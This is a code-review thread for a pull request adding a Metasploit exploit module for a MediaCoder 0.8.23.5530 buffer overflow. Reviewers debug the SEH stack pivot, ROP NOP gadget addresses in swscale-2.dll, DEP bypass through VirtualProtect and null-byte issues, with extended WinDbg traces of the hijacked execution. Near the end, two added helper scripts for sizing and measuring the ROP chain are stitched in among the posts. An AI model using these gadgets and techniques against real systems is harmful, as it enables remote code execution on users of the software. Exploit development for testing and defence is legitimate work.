Added MediaCoder exploit module #2081
Conversation
  end

  def nops(rop=false, n=1)
    return rop ? [0x6ab21799] * n : [0x90909090] * n
I guess this gadget (ret gadget at 0x6ab21799?) is target specific (MediaCoder 0.8.23.5530 in this case). If that's the case, it should be in the target metadata.
Yes, you're correct. I'll change it to 0x6ab16202 from swscale-2.dll; that would be universal, I think.
  end

  def junk(n=1)
    return [rand_text_alpha(4).unpack("L")[0]] * n
Why is the random text repeated n times instead of generating different junk by calling rand_text_alpha(4).unpack("L")[0] n times? That would make the exploit's junk code more random when n > 1.
      'Author' =>
        [
          'metacom', # Vulnerability discovery and PoC
          'modpr0be <modpr0be[at]spentera.com>' # Metasploit module
A comma is needed at the end of the entry.
Strange, msftidy doesn't complain about it. Will add it on next commit.
msftidy doesn't check this. But if you run msfconsole, you will see a complaint though :-)
Works for me on Win XP SP3:
mediacoder version:
Juan, are you on XP too?
No, Win 7 SP1. Okay, giving it a new chance, starting with XP SP3 and 8.23.5530.
Windows XP SP3 with Windows XP SP 3 8.23.5530
Oooough! Finally triggered... needed to interact several times with the GUI to make it crash btw: add the list, click the link, lose the window focus, get the window focus, click the link again:
This time the ret is well aligned and calc spawns:
Now switching to Win 7 SP1.
Again no luck on Win 7 SP1 in my tests, sorry:
Notice on Windows 7, both Juan and I have the exact same ESP address when we do the "ADD ESP, 7ACh" alignment, and then we both experience the same crash due to a bad landing. The ESP address at the time of the alignment also appears to be consistent after retries. I did a quick comparison between a successful attempt on XP vs Win 7, it looks like we're still 0x168 bytes off from the ROP NOP we need:
I'm not very sure why the starting ESP is so different even though we're all on Win 7 SP1. I can only assume maybe somewhere during window subclassing, the system decided to do something different - a condition we need to control.
I did more testing with another physical box, MediaCoder 0.8.23.5530 with Win 7.
(1008.14cc): Break instruction exception - code 80000003 (first chance)
eax=7ffdd000 ebx=00000000 ecx=00000000 edx=7791d5cb esi=00000000 edi=00000000
eip=778b3258 esp=0185ff5c ebp=0185ff88 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll -
ntdll!DbgBreakPoint:
778b3258 cc int 3
0:013> g
(1008.988): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000005e ebx=764dcc28 ecx=04d61b28 edx=fb3ce4d8 esi=005308c8 edi=000a032a
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210286
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
mediacoder+0x2daf3:
0042daf3 88040a mov byte ptr [edx+ecx],al ds:0023:00130000=41
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll -
postproc_52+14435 (6afd4435)
Invalid exception stack at 7cc6f481
0:000> bp 6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=778c62ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000 add esp,7ACh
0:000> t
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=778c62ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000 add esp,7ACh
0:000> t
eax=00000000 ebx=00000000 ecx=6afd4435 edx=778c62ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443b:
6afd443b 5b pop ebx
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\jpeg.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\jpeg.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\libiconv-2.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\avutil-52.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\swscale-2.dll -
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443c:
6afd443c 5e pop esi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443d:
6afd443d 5f pop edi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443e:
6afd443e 5d pop ebp
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443f:
6afd443f c3 ret
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=6ab16202 edi=6ab16202
eip=6ab16202 esp=0012f468 ebp=6ab16202 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
swscale_2!sws_get_class+0xf002:
6ab16202 c3 ret
ESP points to:
0:000> dd esp
0012f468 6ab16202 6ab16202 6ab16202 6ab16202
0012f478 6ab16202 6ab16202 6ab16202 6ab16202
0012f488 100482ff ffffffc0 63547658 66d9d9ba
0012f498 6ab2241d 4b657443 4b657443 4b657443
0012f4a8 4b657443 4b657443 4b657443 4b657443
0012f4b8 4b657443 4b657443 4b657443 4b657443
0012f4c8 4b657443 4b657443 4b657443 4b657443
0012f4d8 1004cc03 6ab561b0 66d9feee 6ab19780
0:000> dd /c1 esp
0012f468 6ab16202
0012f46c 6ab16202
0012f470 6ab16202
0012f474 6ab16202
0012f478 6ab16202
0012f47c 6ab16202
0012f480 6ab16202
0012f484 6ab16202
0012f488 100482ff
0012f48c ffffffc0
0012f490 63547658
0012f494 66d9d9ba
0012f498 6ab2241d
0012f49c 4b657443
0012f4a0 4b657443
0012f4a4 4b657443
0012f4a8 4b657443
0012f4ac 4b657443
0012f4b0 4b657443
0012f4b4 4b657443
0012f4b8 4b657443
0012f4bc 4b657443
0012f4c0 4b657443
0012f4c4 4b657443
0012f4c8 4b657443
0012f4cc 4b657443
0012f4d0 4b657443
0012f4d4 4b657443
0012f4d8 1004cc03
0012f4dc 6ab561b0
0012f4e0 66d9feee
0012f4e4 6ab19780
Windows version:
0:000> version
Windows 7 Version 7600 MP (4 procs) Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.1.7600.16385 (win7_rtm.090713-1255)
Debug session time: Tue Jul 9 10:57:48.363 2013 (GMT+7)
Same result as mine. Any idea how to resolve this? Maybe add more ROP NOPs (0x00000168). It would be good if this module supported DEP, since mediacoder.exe is DEP aware.
Errh, accidentally clicked the close & comment button.
It's not that uncommon to see offset differences between Win7 x86 and Win7 x64 (wow64) - a ROP NOP landing zone should take care of that.
I see modpr0be tested on a Win 7 SP0 box based on his kernel32.dll info, so I set up the same Win 7 box, and then I got it to work:
So perhaps the offset is more specific to the service pack, rather than wow64 vs x86 this time?? I think Juan has been testing on Win 7 SP1, right? If the module doesn't work reliably on SP1, then I suggest:
Either way works for me.
Actually, my test before the last one was tested in Win 7 SP1:
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll -
postproc_52+14435 (6afd4435)
Invalid exception stack at e82d1026
0:000> bp 6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76f371ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000 add esp,7ACh
0:000> p
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76f371ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443b:
6afd443b 5b pop ebx
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76f371ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443c:
6afd443c 5e pop esi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76f371ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443d:
6afd443d 5f pop edi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76f371ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443e:
6afd443e 5d pop ebp
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76f371ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443f:
6afd443f c3 ret
0:000> dd esp L1
0012f464 6ab16202 <-------- Hit the rop nop as we wanted.
Windows version:
0:000> version
Windows 7 Version 7601 (Service Pack 1) MP (2 procs) Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.1.7601.18015 (win7sp1_gdr.121129-1432)
Debug session time: Tue Jul 9 12:49:47.327 2013 (UTC + 7:00)
I fixed the exploit() function to make it work on my box. Although it works, it's not very ideal because the pivot aligns ESP so much (0x7AC); this forces my payload to be very close to the edge of the uncommitted memory. That pretty much means if my payload is too big, the VirtualProtect function won't be able to mark the region RWX. I had to make the size parameter dynamic, because the original hardcoded value to NEG is too big. To overcome the size problem above, it's possible to put an egghunter (that uses VirtualProtect, too) instead of the payload, and then look for a way to put the payload somewhere else for the hunter to find it. But I didn't investigate this approach further. I'm not even sure if this modified function breaks the current one, but anyways, here's my version:
Working on W7 SP1 after applying @wchen-r7 changes:
If the payload cannot contain nulls, then perhaps a check is needed to ensure that "0xffffffff - p.length + 1" will never contain a null byte.
I don't really have a pretty way to do this, but to avoid a null byte in his length value, I guess he can do something like:
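One way to implement the null-byte check asked for above, as an added example that is neither the module's code nor the thread's own suggestion; the names neg32, null_byte? and null_free_size are mine, and the padding approach is an assumption about how a module author might handle a size whose negated form contains a null:

```ruby
# Added example (not the module's own code): sanity-check the negated size
# that a NEG gadget turns back into the VirtualProtect dwSize argument.
# Assumed names: neg32, null_byte?, null_free_size.

# 32-bit two's complement of len, i.e. the value that NEG turns into len.
# This is the "0xffffffff - p.length + 1" expression from the review.
def neg32(len)
  (0xffffffff - len + 1) & 0xffffffff
end

# True if any of the four little-endian bytes of a 32-bit value is 0x00,
# which is what a null-free payload buffer must never contain.
def null_byte?(val)
  [val].pack("V").bytes.include?(0)
end

# Smallest size >= len whose negated form has no null byte. Over-sizing the
# protected region is only safe while it stays inside committed stack, which
# is the caveat the thread raises about the 0x7AC pivot; the caller must
# keep max_pad small for that reason.
def null_free_size(len, max_pad = 0x100)
  (0..max_pad).each do |pad|
    size = len + pad
    return size unless null_byte?(neg32(size))
  end
  raise ArgumentError, "no null-free size within #{max_pad} bytes of #{len}"
end

if __FILE__ == $0
  # Constructed payload lengths: 0x100 negates to 0xffffff00 (null byte),
  # 0x15f negates to 0xfffffea1 (clean).
  [0x100, 0x15f].each do |len|
    size = null_free_size(len)
    printf("len=0x%x neg=0x%08x null=%s chosen=0x%x neg=0x%08x\n",
           len, neg32(len), null_byte?(neg32(len)), size, neg32(size))
  end
end
```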
Doesn't work with @wchen-r7 changes, using windows/exec:
(1ce8.ff4): Break instruction exception - code 80000003 (first chance)
eax=7ffde000 ebx=00000000 ecx=00000000 edx=7707f17d esi=00000000 edi=00000000
eip=7701410c esp=01d3ff5c ebp=01d3ff88 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!DbgBreakPoint:
7701410c cc int 3
0:027> g
(1ce8.1af4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008c ebx=7714ad60 ecx=04bf8b20 edx=fb5374e0 esi=005308c8 edi=000707be
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0 nv up ei ng nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210282
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
mediacoder+0x2daf3:
0042daf3 88040a mov byte ptr [edx+ecx],al ds:0023:00130000=41
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll -
0:000> !exchain
0012f3f4: postproc_52+14435 (6afd4435)
Invalid exception stack at 6afc1446
0:000> bp 6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=770271ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000 add esp,7ACh
0:000> p
eax=00000000 ebx=00000000 ecx=6afd4435 edx=770271ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443b:
6afd443b 5b pop ebx
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\swscale-2.dll -
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=770271ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443c:
6afd443c 5e pop esi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=770271ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443d:
6afd443d 5f pop edi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=770271ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443e:
6afd443e 5d pop ebp
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=770271ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443f:
6afd443f c3 ret
0:000> dd esp L1
0012f464 6ab16202 <-- landed at ROP NOP address
0:000> dd /c1 esp+0x7cc <-- but need 0x7cc to get first gadget
0012fc30 6ab16202
0012fc34 100482ff <-- first rop gadget in rop_gadgets
0012fc38 ffffffc0
0012fc3c 4655546e
0012fc40 66d9d9ba
0012fc44 6ab2241d
0012fc48 71757656
0012fc4c 71757656
0012fc50 71757656
0012fc54 71757656
0012fc58 71757656
0012fc5c 71757656
0012fc60 71757656
0012fc64 71757656
0012fc68 71757656
0012fc6c 71757656
0012fc70 71757656
0012fc74 71757656
0012fc78 71757656
0012fc7c 71757656
0012fc80 71757656
0012fc84 1004a8ee
0012fc88 6ab561b0
0012fc8c 66d9feee
0012fc90 6ab19780
0012fc94 66d929f5
0012fc98 ffffff1b
0012fc9c 444f6850
0012fca0 6ab3c65a
0012fca4 1004cc03
0012fca8 ffffffff
0012fcac 660166e9
Tested in both physical and VM (VirtualBox) environments; both gave me the same result, calc.exe never shows up. If you guys have already tested it and it worked on Windows 7 SP0, then probably I should remove SP1 and change it to SP0.
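The "landed on the ROP NOP but 0x7cc short of the first gadget" measurement above was done by eye on the dd output. As an added helper that is not part of the module or the thread, the following reads a WinDbg dd dump (either the default 4-column layout or /c1) and reports how long the ROP NOP run from ESP is before the first real gadget; parse_dd, rop_nop_run and the embedded DUMP are constructed for this example:

```ruby
# Added example, not from the module or the thread: measure the ROP NOP run
# in a WinDbg "dd" dump starting at ESP. Assumed names: parse_dd, rop_nop_run.

ROP_NOP = 0x6ab16202  # ret gadget in swscale-2.dll, as used in the thread

# Constructed dump in the "dd /c1 esp" format: a short sled of ret gadgets
# followed by the first real gadget, mirroring the layout seen in the thread.
DUMP = <<~TXT
  0012f464 6ab16202
  0012f468 6ab16202
  0012f46c 6ab16202
  0012f470 6ab16202
  0012f474 100482ff
  0012f478 ffffffc0
  0012f47c 4655546e
TXT

# Parse "dd" output into [address, dword] pairs. The first token of a line is
# the address; each following 8-hex-digit token is a dword at +4. Prompt
# lines ("0:000> dd esp") and trailing annotations ("<-- ...") are ignored.
def parse_dd(text)
  hex = /\A[0-9a-f]{8}\z/i
  text.each_line.flat_map do |line|
    toks = line.split
    next [] unless toks.size >= 2 && toks[0] =~ hex
    base = toks.shift.hex
    vals = toks.take_while { |t| t =~ hex }
    vals.each_with_index.map { |t, i| [base + 4 * i, t.hex] }
  end
end

# Walk the dump from its first address (taken to be ESP) and report how many
# ROP NOPs precede the first non-NOP dword and at what offset it sits.
# Returns nil when the sled never ends inside the dump, which is the case
# a tester needs to spot: the gadgets are further away than the dump shows.
def rop_nop_run(entries, nop = ROP_NOP)
  return nil if entries.empty?
  esp = entries.first[0]
  entries.each do |addr, val|
    next if val == nop
    return { nops: (addr - esp) / 4, offset: addr - esp, first_gadget: val }
  end
  nil
end

if __FILE__ == $0
  r = rop_nop_run(parse_dd(DUMP))
  printf("%d ROP NOPs, first gadget 0x%08x at esp+0x%x\n",
         r[:nops], r[:first_gadget], r[:offset])
end
```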
Yeah, that'd be great. Thanks.
Merged, thanks.
This is an exploit module for the MediaCoder exploit from exploit-db.com, EDB-ID 26403.